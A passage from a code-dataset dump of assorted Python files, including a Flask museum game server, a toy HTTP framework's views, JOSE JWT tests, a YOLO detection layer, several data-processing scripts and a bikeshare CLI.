dicRealP1[keyP1]['EMP'] + [entryL68BEMP] \n\t\tif (matriceVide): #la matrice est vide si toute les valeurs de P1 sont vides\n\t\t\tmatriceVide = 0\n\t\t\tdel dicRealP1[keyP1] #on supprime les reference inutiles aux matrices vide \n\t\t\tfileLog.write('Matrice Vide = ' + keyP1 + '\\n') \n\t#TRAITEMENT DES MATRICES \n\ttraitementMatrice(dicRealP1, dicMatrice, dicNoProduct)\n \ntraitementFichierCSV()\nfileOutput.close()\nfileLog.close() ","sub_path":"procpy/source/matrixLmultI.py","file_name":"matrixLmultI.py","file_ext":"py","file_size_in_byte":20490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357053826","text":"import numpy as np\nimport sys\nimport os\nimport time\nimport gym\n\n\ndiscrete_obs_win_size = 40\n\n\ndef get_discrete_state(state):\n dc_state = (state - env.observation_space.low) / discrete_obs_win_size\n return tuple(dc_state.astype(np.int))\n\n\nif __name__ == \"__main__\":\n numbers = np.linspace(0, 49990, 5)\n\n env = gym.make('MountainCar-v0')\n\n for num in numbers:\n file = f\"{int(num)}-qtable.npy\"\n file_path = f\"qtables_22/{file}\"\n print(f\"path: {file_path}\")\n q_table = np.load(file_path, allow_pickle=True)\n\n step = 0\n discrete_state = get_discrete_state(env.reset())\n\n done = False\n while not done:\n\n action = np.argmax(q_table[discrete_state])\n new_state, reward, done, _ = env.step(action)\n time.sleep(0.03)\n step += 1\n\n","sub_path":"gym-train/sentdex/q-learning/record_game.py","file_name":"record_game.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"163054161","text":"\n\ndef reorg(fname, output_fname, start_idx=0):\n with open(fname, 'rt') as f:\n lines = f.readlines()\n \n #output_lines = [\" -1\", \" -1\", \" -1\", \" -1\"]\n# output_lines = [\" -1 #fairseq:overwrite\", \n# \" -1 #fairseq:overwrite\", \n# \" -1 #fairseq:overwrite\", \n# \" -1 #fairseq:overwrite\"]\n output_lines = []\n for i, line in enumerate(lines[start_idx:]):\n token, nll = line.split()\n output_lines.append('{} {}'.format(token, i))\n\n with open(output_fname, 'wt') as f:\n f.writelines('\\n'.join(output_lines))\n\n\nif __name__ == '__main__':\n# fname = \"/workspace/models/vocabs/spm/libri.16k.vocab\"\n# output_fname = \"libri.16k.fairvocab\"\n# reorg(fname, output_fname, 4)\n import sys\n fname = sys.argv[1]\n output_fname = sys.argv[2]\n reorg(fname, output_fname, 4)\n\n","sub_path":"preprocess_for_fairseq/reorganize_dict.py","file_name":"reorganize_dict.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"603231044","text":"import pandas as pd\nfrom datetime import datetime\nimport csv\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.patches as mpatches\n\nheaders = ['Benchmark','Supplier','Size','Score']\ndf = pd.read_csv('data.csv',names=headers)\n\ni = 0\nfor benchmark, df_benchmark in df.groupby('Benchmark'):\n for size, df_size in df_benchmark.groupby('Size'):\n print(df_size)\n plt.bar(df_size['Supplier'], df_size['Score'])\n\n benchmark_patch = mpatches.Patch(label=benchmark)\n size_patch = mpatches.Patch(label=size)\n plt.legend(handles=[benchmark_patch, size_patch])\n\n i += 1\n\n # rotate labels\n plt.gcf().subplots_adjust(bottom=0.5)\n plt.xticks(rotation=90)\n plt.savefig(str(i))\n #plt.show()\n plt.clf()\n","sub_path":"lab2/charts/plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"560318014","text":"from enum import IntEnum, auto\n\nfrom sanic.compat import UpperStrEnum\n\n\nclass RestartOrder(UpperStrEnum):\n SHUTDOWN_FIRST = auto()\n STARTUP_FIRST = auto()\n\n\nclass ProcessState(IntEnum):\n IDLE = auto()\n RESTARTING = auto()\n STARTING = auto()\n STARTED = auto()\n ACKED = auto()\n JOINED = auto()\n TERMINATED = auto()\n","sub_path":"sanic/worker/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"34792321","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: export_data.py\n# Author: lhy\n# Date: 18-8-8\n\nimport jieba\nimport os\nimport random\nimport re\n\n\nclass LawCorpusGen:\n def __init__(self):\n\n self.lawsuit_path = '../corpus_lawsuit'\n\n self.src_train = 'src_train.txt'\n self.tgt_train = 'tgt_train.txt'\n self.src_val = 'src_val.txt'\n self.tgt_val = 'tgt_val.txt'\n self.unk_flag = ''\n\n self.train_rate = 0.9\n self.words_threshold = 0.8\n\n self.vocab = dict()\n self.contents = list()\n\n def words_seg(self, line):\n return [word for word in jieba.cut(line)]\n\n def is_word(self, char):\n return u'\\u4e00' <= char <= u'\\u9fff'\n\n def content_filter(self, content):\n if len(content) == 0:\n return None\n content_filted = list()\n words_seg = self.words_seg(content)\n word_num = 0\n for word in words_seg:\n if self.is_word(word):\n word_num += 1\n content_filted.append(word)\n else:\n content_filted.append(self.unk_flag)\n if word_num/len(words_seg) >= self.words_threshold:\n return content_filted\n else:\n return None\n\n def file_filter(self):\n for file in os.listdir(self.lawsuit_path):\n file_path = os.path.join(self.lawsuit_path, file)\n f = open(file_path, 'r')\n for line in f:\n if line.startswith('category') or line.startswith('title') \\\n or line.startswith('publictime') or line.startswith('content'):\n continue\n contents = re.split('。|!|?|,|:|、|;|(|)', line.strip())\n for content in contents:\n content_filted = self.content_filter(content)\n if content_filted:\n self.contents.append(content_filted)\n f.close()\n return\n\n def vocab_gen(self):\n for content in self.contents:\n for word in content:\n if word in self.vocab:\n self.vocab[word] += 1\n else:\n self.vocab[word] = 1\n print('vocab size =', len(self.vocab))\n\n return\n\n def vocab_write(self):\n f = open('vocab.txt', 'w')\n sorted_vocab = sorted(zip(self.vocab.values(), self.vocab.keys()), reverse=True)\n for freq, word in sorted_vocab:\n f.write(word + '\\t' + str(freq) + '\\n')\n\n f.close()\n return\n\n def corpus_gen(self):\n src_train_f = open(self.src_train, 'w')\n tgt_train_f = open(self.tgt_train, 'w')\n src_val_f = open(self.src_val, 'w')\n tgt_val_f = open(self.tgt_val, 'w')\n\n for words in self.contents:\n if len(words) < 2:\n continue\n rand_seed = random.random()\n if rand_seed <= self.train_rate:\n for i in range(1, len(words)):\n src_train_f.write(' '.join(words[:i]) + '\\n')\n tgt_train_f.write(' '.join(words[i:]) + '\\n')\n else:\n for i in range(1, len(words)):\n src_val_f.write(' '.join(words[:i]) + '\\n')\n tgt_val_f.write(' '.join(words[i:]) + '\\n')\n\n src_train_f.close()\n src_train_f.close()\n src_train_f.close()\n src_train_f.close()\n\n return\n\n\ngener = LawCorpusGen()\ngener.file_filter()\ngener.vocab_gen()\ngener.vocab_write()\ngener.corpus_gen()\n","sub_path":"script_spider/law_corpus_gen.py","file_name":"law_corpus_gen.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"335025468","text":"# Copyright 2018 The KaiJIN Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Code from https://github.com/eriklindernoren/PyTorch-YOLOv3\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\n\nclass YOLOLayer(nn.Module):\n \"\"\"Detection layer\"\"\"\n\n def __init__(self, anchors, num_classes, img_dim=416):\n super(YOLOLayer, self).__init__()\n self.anchors = anchors\n self.num_anchors = len(anchors)\n self.num_classes = num_classes\n self.ignore_thres = 0.5\n self.mse_loss = nn.MSELoss()\n self.bce_loss = nn.BCELoss()\n self.obj_scale = 1\n self.noobj_scale = 100\n self.metrics = {}\n self.img_dim = img_dim\n self.grid_size = 0 # grid size\n\n def compute_grid_offsets(self, grid_size, cuda=True):\n self.grid_size = grid_size\n g = self.grid_size\n FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n self.stride = self.img_dim / self.grid_size\n # Calculate offsets for each grid\n self.grid_x = torch.arange(g).repeat(\n g, 1).view([1, 1, g, g]).type(FloatTensor)\n self.grid_y = torch.arange(g).repeat(\n g, 1).t().view([1, 1, g, g]).type(FloatTensor)\n self.scaled_anchors = FloatTensor(\n [(a_w / self.stride, a_h / self.stride) for a_w, a_h in self.anchors])\n self.anchor_w = self.scaled_anchors[:, 0:1].view(\n (1, self.num_anchors, 1, 1))\n self.anchor_h = self.scaled_anchors[:, 1:2].view(\n (1, self.num_anchors, 1, 1))\n\n print(self.grid_x.shape, self.grid_y.shape, self.anchor_w.shape, self.anchor_h.shape)\n print(self.grid_x)\n\n def forward(self, x, targets=None, img_dim=None):\n\n # Tensors for cuda support\n FloatTensor = torch.cuda.FloatTensor if x.is_cuda else torch.FloatTensor\n LongTensor = torch.cuda.LongTensor if x.is_cuda else torch.LongTensor\n ByteTensor = torch.cuda.ByteTensor if x.is_cuda else torch.ByteTensor\n\n self.img_dim = img_dim\n num_samples = x.size(0)\n grid_size = x.size(2)\n\n\n prediction = (\n x.view(num_samples, self.num_anchors,\n self.num_classes + 5, grid_size, grid_size)\n .permute(0, 1, 3, 4, 2)\n .contiguous()\n )\n print(x.shape, prediction.shape)\n\n # Get outputs\n x = torch.sigmoid(prediction[..., 0]) # Center x\n y = torch.sigmoid(prediction[..., 1]) # Center y\n w = prediction[..., 2] # Width\n h = prediction[..., 3] # Height\n pred_conf = torch.sigmoid(prediction[..., 4]) # Conf\n pred_cls = torch.sigmoid(prediction[..., 5:]) # Cls pred.\n\n # If grid size does not match current we compute new offsets\n if grid_size != self.grid_size:\n self.compute_grid_offsets(grid_size, cuda=x.is_cuda)\n\n # Add offset and scale with anchors\n pred_boxes = FloatTensor(prediction[..., :4].shape)\n pred_boxes[..., 0] = x.data + self.grid_x\n pred_boxes[..., 1] = y.data + self.grid_y\n pred_boxes[..., 2] = torch.exp(w.data) * self.anchor_w\n pred_boxes[..., 3] = torch.exp(h.data) * self.anchor_h\n print(pred_boxes.shape)\n\n output = torch.cat((\n pred_boxes.view(num_samples, -1, 4) * self.stride,\n pred_conf.view(num_samples, -1, 1),\n pred_cls.view(num_samples, -1, self.num_classes)), -1)\n\n if targets is None:\n return output, 0\n else:\n iou_scores, class_mask, obj_mask, noobj_mask, tx, ty, tw, th, tcls, tconf = build_targets(\n pred_boxes=pred_boxes,\n pred_cls=pred_cls,\n target=targets,\n anchors=self.scaled_anchors,\n ignore_thres=self.ignore_thres,\n )\n\n # Loss : Mask outputs to ignore non-existing objects (except with conf. loss)\n loss_x = self.mse_loss(x[obj_mask], tx[obj_mask])\n loss_y = self.mse_loss(y[obj_mask], ty[obj_mask])\n loss_w = self.mse_loss(w[obj_mask], tw[obj_mask])\n loss_h = self.mse_loss(h[obj_mask], th[obj_mask])\n loss_conf_obj = self.bce_loss(pred_conf[obj_mask], tconf[obj_mask])\n loss_conf_noobj = self.bce_loss(pred_conf[noobj_mask], tconf[noobj_mask])\n loss_conf = self.obj_scale * loss_conf_obj + self.noobj_scale * loss_conf_noobj\n loss_cls = self.bce_loss(pred_cls[obj_mask], tcls[obj_mask])\n total_loss = loss_x + loss_y + loss_w + loss_h + loss_conf + loss_cls\n\n # Metrics\n cls_acc = 100 * class_mask[obj_mask].mean()\n conf_obj = pred_conf[obj_mask].mean()\n conf_noobj = pred_conf[noobj_mask].mean()\n conf50 = (pred_conf > 0.5).float()\n iou50 = (iou_scores > 0.5).float()\n iou75 = (iou_scores > 0.75).float()\n detected_mask = conf50 * class_mask * tconf\n precision = torch.sum(iou50 * detected_mask) / (conf50.sum() + 1e-16)\n recall50 = torch.sum(iou50 * detected_mask) / (obj_mask.sum() + 1e-16)\n recall75 = torch.sum(iou75 * detected_mask) / (obj_mask.sum() + 1e-16)\n\n self.metrics = {\n \"loss\": to_cpu(total_loss).item(),\n \"x\": to_cpu(loss_x).item(),\n \"y\": to_cpu(loss_y).item(),\n \"w\": to_cpu(loss_w).item(),\n \"h\": to_cpu(loss_h).item(),\n \"conf\": to_cpu(loss_conf).item(),\n \"cls\": to_cpu(loss_cls).item(),\n \"cls_acc\": to_cpu(cls_acc).item(),\n \"recall50\": to_cpu(recall50).item(),\n \"recall75\": to_cpu(recall75).item(),\n \"precision\": to_cpu(precision).item(),\n \"conf_obj\": to_cpu(conf_obj).item(),\n \"conf_noobj\": to_cpu(conf_noobj).item(),\n \"grid_size\": grid_size,\n }\n\n return output, total_loss\n","sub_path":"tw/nn/layer/yolo_layer.py","file_name":"yolo_layer.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"374783338","text":"# Uses python3\nimport sys\n\ndef get_fibonacci_last_digit(n):\n if (n <= 1):\n return n\n else:\n a,b = 0,1\n for num in range((n-1)%60):\n rem = a + b\n rem = rem % 10\n b, a = rem, b\n return rem\n\ndef fib_sum_last_digit(n):\n a, b = 0, 1\n for i in range((n + 2) % 60):\n a, b = b, (a + b) % 10\n if a == 0:\n return 9\n else:\n return a - 1\n\ndef fibonacci_partial_sum(from_, to):\n if (from_ == to):\n num = get_fibonacci_last_digit(from_)\n return num\n x = fib_sum_last_digit(from_ - 1)\n y = fib_sum_last_digit(to)\n if (y >= x):\n return (y-x)\n else:\n return ((y+10) - x)\n \n\n\nif __name__ == '__main__':\n input = sys.stdin.read();\n from_, to = map(int, input.split())\n print(fibonacci_partial_sum(from_, to))","sub_path":"Algorithmic toolbox - Coursera/week2_algorithmic_warmup/fibonacci_partial_sum.py","file_name":"fibonacci_partial_sum.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136487059","text":"from zipfile import ZipFile\n\nurl = \"http://www.pythonchallenge.com/pc/def/{}.html\"\n\nnothing = \"90052\"\n\nwith ZipFile('./channel.zip', 'r') as z:\n while True:\n try:\n with z.open(\"{}.txt\".format(nothing)) as f:\n nothing = f.read()[16:].decode('utf-8')\n print(z.getinfo(f.name).comment.decode('utf-8'), end=\"\")\n except KeyError:\n break\n\n\n#This reveals the key is oxygen\nfinal = \"oxygen\"\n\nprint(url.format(final))","sub_path":"Problem_6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"217757033","text":"from flask import Flask, jsonify, request\nfrom Classes import Detective, Museum, Team\nimport os\nfrom Database import db_setup, user_data_update, get_next_id, db_next_object, db_next_hint, db_check, get_gallery_data\nimport Database\n\nusers = dict() # Initialize users dictionary. Only new users are to be added to this dictionary!\nusers['member_list'] = [['User Name', 0]] # Initialize list of members with their user ids.\n\nphila = Museum() # Initialize the philadelphia art museum\napp = Flask(__name__) # Initialize the app.\n\nrunning_file_name = os.path.basename(__file__) # Find name of current running file.\ndb_setup(app, running_file_name) # Setup database (if necessary)\n\n\n# Adding a new user\n@app.route(\"/signup\", methods=['POST'])\ndef new_user():\n global users\n\n new_id = get_next_id() # Calculate new user_id\n users[str(new_id)] = Detective(user_name='Blank') # Generate new user in users dict\n data = {'_id': users[str(new_id)]._user_id}\n return jsonify(data) # Confirm that account was set up!\n\n\n# Easy login process\n@app.route('/easylogin', methods=['POST'])\ndef easy_login():\n global users # Indicate that we wanna change users globally\n\n try:\n user_id = request.json[\"UserID\"] # Get user id\n users[user_id] = Detective(user_id=user_id) # Change users\n except TypeError:\n raise Exception('UserID does not exist in database.')\n except KeyError:\n raise Exception('Missing or bad UserID')\n # Return confirmation of login.\n return jsonify({'Logged In': True})\n\n\n# Get user data\n@app.route(\"/user/\", methods=['GET'])\ndef user_data(name):\n try:\n data = users[int(name)].get() # Get user data\n except KeyError:\n raise Exception('User not logged in.')\n return jsonify(data) # Return user data\n\n\n# Typing suggestions based on gallery. Provides a list of titles.\n@app.route(\"/gallery/\", methods=['GET'])\ndef type_sug(gallery_number):\n data = jsonify(get_gallery_data(gallery_number)) # Get the data (list of titles for now)\n return data\n\n\n''' SAVE FOR LATER!!!!\n# Get team stats\n@app.route(\"/team/\", methods=['GET'])\ndef team_stats(name):\n print(name)\n data = eval(name).team_stats()\n return data\n'''\n\n\n# Gets user level/path data.\n@app.route('/level', methods=['POST'])\ndef start_level():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n step = request.json['Step'] # Get the step\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n\n return jsonify(db_next_object(level, step))\n\n\n# Gets user level/path data.\n@app.route('/submit', methods=['POST'])\ndef check_answer():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n step = request.json['Step'] # Get the step\n guess = request.json['Guess'] # Get the guess\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n\n mybool = db_check(level, step, guess)\n answer = jsonify(mybool)\n if mybool is True:\n global users\n try:\n users[int(user_id)].points += 5 # Add points\n users[int(user_id)].db_update() # Update Database.\n except KeyError:\n raise Exception('User not logged in.')\n\n return answer\n\n\n@app.route('/hint', methods=['POST'])\ndef get_hint():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n step = request.json['Step'] # Get the step\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n hint = db_next_hint(level, step)\n data = jsonify({'Hint': hint})\n return hint\n\n\n# Update user location\n@app.route('/location', methods=['POST'])\ndef get_gallery_location():\n try:\n user_id = request.json['UserID'] # Get the user id.\n gallery = request.json['Gallery'] # Get the gallery number\n except:\n raise Exception(\"No ID or gallery.\") # Raise exception\n global users # Call the user directory\n users[user_id].get_gallery_location(gallery) # Update the user location\n\n\n@app.route('/getobjects', methods=['POST'])\ndef get_cases():\n try:\n user_id = request.json['UserID'] # Get the user id.\n level = request.json['Level'] # Get the level\n except KeyError as error: # Generate exception if Client is missing a necessary element\n missing_elem = error.args[0] # Index the missing element\n raise Exception(\"Missing '%s' in POST json.\" % missing_elem) # Alert client to missing element\n data = Database.db_get_all_objects(level) # Collect data\n\n return jsonify(data) # Ship it out!\n\n\n@app.route(\"/\")\ndef hello():\n return \"Welcome to Art Tracker!\"\n\n\nprint(__name__)\n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)\n","sub_path":"Back End/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"560222759","text":"import urllib.parse\nfrom datetime import datetime\nfrom pprint import pformat\n\nfrom henango.http.cookie import Cookie\nfrom henango.http.request import HTTPRequest\nfrom henango.http.response import HTTPResponse\nfrom henango.template.renderer import render\n\n\ndef now(request: HTTPRequest) -> HTTPResponse:\n \"\"\"\n 現在時刻を表示するHTMLを生成する\n \"\"\"\n context = {\"now\": datetime.now()}\n body = render(\"now.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef show_request(request: HTTPRequest) -> HTTPResponse:\n \"\"\"\n HTTPリクエストの内容を表示するHTMLを生成する\n \"\"\"\n context = {\"request\": request, \"headers\": pformat(request.headers), \"body\": request.body.decode(\"utf-8\", \"ignore\")}\n body = render(\"show_request.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef parameters(request: HTTPRequest) -> HTTPResponse:\n \"\"\"\n POSTパラメータを表示するHTMLを表示する\n \"\"\"\n\n # GETリクエストの場合は、405を返す\n if request.method == \"GET\":\n body = b\"

405 Method Not Allowed

\"\n\n return HTTPResponse(body=body, status_code=405)\n\n elif request.method == \"POST\":\n context = {\"params\": urllib.parse.parse_qs(request.body.decode())}\n body = render(\"parameters.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef user_profile(request: HTTPRequest) -> HTTPResponse:\n context = {\"user_id\": request.params[\"user_id\"]}\n\n body = render(\"user_profile.html\", context)\n\n return HTTPResponse(body=body)\n\n\ndef set_cookie(request: HTTPRequest) -> HTTPResponse:\n return HTTPResponse(cookies=[Cookie(name=\"username\", value=\"TARO\")])\n\n\ndef login(request: HTTPRequest) -> HTTPResponse:\n if request.method == \"GET\":\n body = render(\"login.html\", {})\n return HTTPResponse(body=body)\n\n elif request.method == \"POST\":\n post_params = urllib.parse.parse_qs(request.body.decode())\n username = post_params[\"username\"][0]\n email = post_params[\"email\"][0]\n\n cookies = [\n Cookie(name=\"username\", value=username, max_age=30),\n Cookie(name=\"email\", value=email, max_age=30),\n ]\n\n return HTTPResponse(status_code=302, headers={\"Location\": \"/welcome\"}, cookies=cookies)\n\n\ndef welcome(request: HTTPRequest) -> HTTPResponse:\n # Cookieにusernameが含まれていなければ、ログインしていないとみなして/loginへリダイレクト\n if \"username\" not in request.cookies:\n return HTTPResponse(status_code=302, headers={\"Location\": \"/login\"})\n\n # Welcome画面を表示\n username = request.cookies[\"username\"]\n email = request.cookies[\"email\"]\n body = render(\"welcome.html\", context={\"username\": username, \"email\": email})\n\n return HTTPResponse(body=body)\n","sub_path":"codes/chapter20-4/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609112965","text":"import os\n#declarar las variables\ncliente,empresa_azucarera,quintales_azucar,precio_quintal=\"\",\"\",0.0,0.0\n\n\n#input\ncliente=os.sys.argv[1]\nempresa_azucarera=os.sys.argv[2]\nquintales_azucar=int(os.sys.argv[3])\nprecio_quintal=float(os.sys.argv[4])\n\n#validador de datos\ncliente_incorrect=(cliente!=\"luis\")\nazucarera_incorrecta=(empresa_azucarera!=\"pomalca\" and empresa_azucarera!=\"tuman\" and empresa_azucarera!=\"pucala\")\nquintales_incorrect=(quintales_azucar<0)\nprecio_quintal_incorrect=(precio_quintal<0)\n\n#mientras lo sdatos ingresados sean incorrectos\nwhile(cliente_incorrect):\n cliente=input(\"ingresar cliente correcto:\")\n cliente_incorrect=(cliente!=\"luis\")\n\nwhile(azucarera_incorrecta):\n empresa_azucarera=input(\"ingrese nombre azucarera correcta:\")\n azucarera_incorrecta=(empresa_azucarera!=\"pomalca\" and empresa_azucarera!=\"tuman\" and empresa_azucarera!=\"pucala\")\n\nwhile(quintales_incorrect):\n quintales_azucar=int(input(\"ingresar los quintales de azucar correctos:\"))\n quintales_incorrect=(quintales_azucar<0)\n\nwhile(precio_quintal_incorrect):\n precio_quintal=float(input(\"ingresar elprecio correcto de cada quintal:\"))\n precio_quintal_incorrect=(precio_quintal<0)\n\n#fin_while\nprint(\"fin del bucle\")\n\n#processing\ntotal=quintales_azucar*precio_quintal\nigv=total*0.18\ntotal_pagar=total+igv\n\n\n#output\nprint(\"#############################################################\")\nprint(\"# AZUCAR POMALCA\t\t #\")\nprint(\"#############################################################\")\nprint(\"cliente:\", cliente ,\"empresa azucarera:\", empresa_azucarera)\nprint(\"#############################################################\")\nprint(\"#\")\nprint(\"#item:\", quintales_azucar, \"quintales de azucar\")\nprint(\"#P.U.:\", precio_quintal)\nprint(\"#total:\", total)\nprint(\"#IGV:\", igv)\nprint(\"total a pagar:\", total_pagar)\nprint(\"#############################################################\")","sub_path":"damian/bucle_mientras/ejer5.py","file_name":"ejer5.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"412912953","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nfrom jose.tests import (\n JWT_A1, JWT_A2,\n JWS_A2,\n JWE_A2,\n)\n\nfrom jose.jwk import Jwk, JwkSet\nfrom jose.jwt import Jwt\nfrom jose.crypto import KeyOwner\nfrom jose.jwa.keys import KeyTypeEnum\n\n\nclass TestEntity(KeyOwner):\n def __init__(self, identifier, jku, jwkset=None):\n self.identifier = identifier \n self.jku = jku \n self.jwkset = jwkset or JwkSet(\n keys=[\n Jwk.generate(KeyTypeEnum.RSA),\n Jwk.generate(KeyTypeEnum.EC),\n Jwk.generate(KeyTypeEnum.OCT),\n ] \n ) \n\n def get_key(self, crypto, *args, **kwargs):\n return self.jwkset.get_key(\n crypto.key_type, kid=crypto.kid\n ) \n\nclass TestJwt(unittest.TestCase):\n\n def test_appendix_a1(self):\n '''\n nose2 jose.tests.test_jwt.TestJwt.test_appendix_a1\n '''\n sender = TestEntity(\n \"http://sender\", \"http://sender/jwkset\",\n )\n receiver = TestEntity(\n \"http://receiver\", \"http://receiver/jwkset\",\n JwkSet(keys=[Jwk(**JWE_A2.jwk_dict)])\n )\n\n token = Jwt.parse(JWT_A1.token, sender, receiver)\n\n self.assertEqual(token.iss, \"joe\")\n self.assertEqual(token.exp, 1300819380)\n self.assertTrue(token['http://example.com/is_root'])\n\n def test_appendix_a2(self):\n '''\n nose2 jose.tests.test_jwt.TestJwt.test_appendix_a2\n\n '''\n sender = TestEntity(\n \"http://sender\", \"http://sender/jwkset\",\n JwkSet(keys=[Jwk(**JWE_A2.jwk_dict)])\n )\n receiver = TestEntity(\n \"http://receiver\", \"http://receiver/jwkset\",\n JwkSet(keys=[Jwk(**JWE_A2.jwk_dict)])\n )\n\n token = Jwt.parse(JWT_A2.nested_token, sender, receiver)\n\n self.assertEqual(token.iss, \"joe\")\n self.assertEqual(token.exp, 1300819380)\n self.assertTrue(token['http://example.com/is_root'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/jose/tests/test_jwt.py","file_name":"test_jwt.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"113483971","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='MstAffiliation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('affiliation', models.CharField(max_length=100, db_index=True)),\n ('created_at', models.DateTimeField()),\n ('updated_at', models.DateTimeField()),\n ],\n options={\n 'db_table': 'mst_affiliation',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='MstAuthor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('author', models.CharField(max_length=100, db_index=True)),\n ('mst_affiliation_id', models.IntegerField(db_index=True)),\n ('created_at', models.DateTimeField()),\n ('updated_at', models.DateTimeField()),\n ],\n options={\n 'db_table': 'mst_author',\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='mstauthor',\n unique_together=set([('author', 'mst_affiliation_id')]),\n ),\n ]\n","sub_path":"apps/statweb/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198687466","text":"def main():\n f = open(\"words.txt\",\"r\")\n content = f.readlines()\n words_dict = {}\n for line in content:\n words = line.replace('\\n','').split(' ')\n # print(words)\n for word in words:\n if word not in words_dict:\n words_dict[word] = 1\n else:\n words_dict[word] += 1\n\n for word, times in sorted(words_dict.items(), lambda x, y: cmp(x[1], y[1]), reverse=True):\n print(word + ' ' + str(times))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CheckWords.py","file_name":"CheckWords.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"253237082","text":"import time\nimport pandas as pd\nimport numpy as np\n\npd.set_option('display.max_columns', None)\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\nmonth_list = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\nday_list = ['sunday', 'monday', 'tuesday','wednesday','thursday','friday','saturday','all']\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n print('Would you like to see Data for Chicago, New York City, or Washington?')\n city = input().lower()\n while city not in CITY_DATA.keys():\n print('Incorrect input: Would you like to see Data for Chicago, New York City, or Washington? Please type one of the three cities')\n city = input().lower()\n\n # get user input for month (all, january, february, ... , june)\n print('What month (January - June) would you like to filter the data by? Type \"all\" for no month filter.')\n month = input().lower()\n while month not in month_list:\n print('Incorrect input: What month (January - June) would you like to filter the data by? Type \"all\" for no month filter.')\n month = input().lower()\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n print('What day would you like to filter the data by? Type 